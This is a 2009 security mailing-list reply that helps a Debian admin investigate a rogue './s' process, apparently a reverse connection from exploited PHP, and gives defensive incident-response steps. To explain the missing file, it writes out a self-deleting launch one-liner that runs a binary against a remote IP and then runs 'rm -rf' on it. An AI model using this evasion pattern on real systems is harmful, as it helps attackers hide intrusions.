Re: found clues about a security issue in a web server

On Domingo 15 Marzo 2009 11:40:22 kazabe escribió:
Hi.

In the latest week my internet connection was frozen. After discard
ISP and routing problems, i see this process in my webserver (stored
behind my router):

www-data 20580 00 00 815 355 ? S 07:16 6:01
./s 86.23.114.12 80

that process was using all the bandwith (the address displayed is a
remote IP, without any relationship with us). After kill that
process, the internet service is normal again. The router and the
webserver are running under Debian Lenny. The web server is not
remotely accesible. all the administration is phisically in the PC.
The webserver dont have any remote access (dont have ftp, or ssh, or
telnet. Nothing).

I try to found that "./s" but i cant found it yet. How can i detect
how was inyected that script?

Hi, sounds like Scripting bad code explotation (PHP, JSP, Perl, etc...)

Why?

running ./s as www-data sounds like reverse connection started with apache
user, that are probable to happen on scripting explotation attacks.

More if you say that the only internet-open port are the webserver.
------------------------------------------------------


The webserver is only to publish a website related with company
internal process (but is published to Internet, by a port forwarding
from the router). That website use php and mysql.

What can i check to solve that security issue?

Thanks in advance.


That security issue happen's by a bad-programmed script code, first of all,
what script code are installed on your server (php, jsp, mono asp.net, perl,
cgi-bin, etc)?

If it's a CMS, are properly updated?

Each language are a bit different from each other..., Ex. on php, "safe_mode
on" are mandatory on security matter, "url_fopen off" are mandatory to prevent
RFI...

Don't use or activate anything that you dont really use... if you dont use
cgi-bin, DISABLE IT.

-------------------------------------------------
location of s.

check on /tmp
check on www-data writeable dirs

but remember, s could be deleted when you kill him, a simple bash sentence
demostrate that:

(./s 86.23.114.12 80; rm -rf ./s)

Then when you kill s, the rm -rf act... and bye bye to s.

---------------------------------------------------
Scope:

That ps line prove that a hacker have the REMOTE control of a user-shell on
your server, that is sufficiently bad, you could have trojans/rootkits. (Dont
even think about your firewalls, doesn't protect you on reverse connections)

More worse scenario involves root compromise and other system's compromise
over network using mitm, etc...

---------------------------------------------------
Sugerency:

- Down your portal
- Check your apache logs (/var/log/www or similar).
- Check for rootkits
- Check for
- Create a hard-drive image (http://dcfldd.sourceforge.net/)
- Reinstall (please check if your linux distro are currently mantained, its so
important...)
- Do a server security hardening
- Check for updates and enable auto-updates
- Audit your code (PHP or something), update everything hand-updeteable like
CMS, etc
- Audit your FS permisology (chown and chmod are your best friend)
- Up your portal
- Weekly reboot your server (uptime are the best enemy of security)



;-)


------------------------------------------------------------------------
This list is sponsored by: InfoSec Institute

Find the source of cybercrime! Almost every crime today involves a computer or mobile device. Learn how to become a Computer Forensics Examiner in InfoSec Institute's hands-on Computer Forensics Course. Up to three industry recognized certs available, online computer forensics training available.

http://www.infosecinstitute.com/courses/computer_forensics_training.html
------------------------------------------------------------------------

Relevant Pages

  • Re: permissions and script visibility
    ... URLs typically have the name of the php script ... That would make sense...the webserver needs to know which file to look ... Web browser tells server he wants to get foo.php. ... so the source code of the script gets sent to the PHP engine. ...
    (comp.lang.php)
  • Re: PHP blamed for security problems
    ... >> With source code, you are preserving a trade secret. ... That this was a problem only for PHP was never asserted. ... * That it's easy to write a script that accidentally allows access ... to everything the webserver has access to; ...
    (comp.lang.php)
  • Re: Can PHP do this? - newbie Q
    ... My next question was how to set-up the webserver with DDNS, ... Can I run PHP on a Windows machine as a daily task to update ... Windows command line program. ... The script will need to determine the ...
    (comp.lang.php)
  • Re: Can PHP do this? - newbie Q
    ... Can I run PHP on a Windows machine as a daily task to update a remotely hosted webpage with a current link to the webcam's webserver? ... The script will need to determine the current IP address of the machine that it is running on, and that the IP camera is also connected to. ... configure your broadband/highspeed DSL router to port forward 80/443 to your internal server ...
    (comp.lang.php)
  • Configuring PHP 4.2 and Apache 2
    ... searched the internet and couldn't find a solution ... pre-install of Apache2 and PHP. ... and went to the script it would come up with the ERROR 500: ... does this create a security hole? ...
    (alt.php)
Loading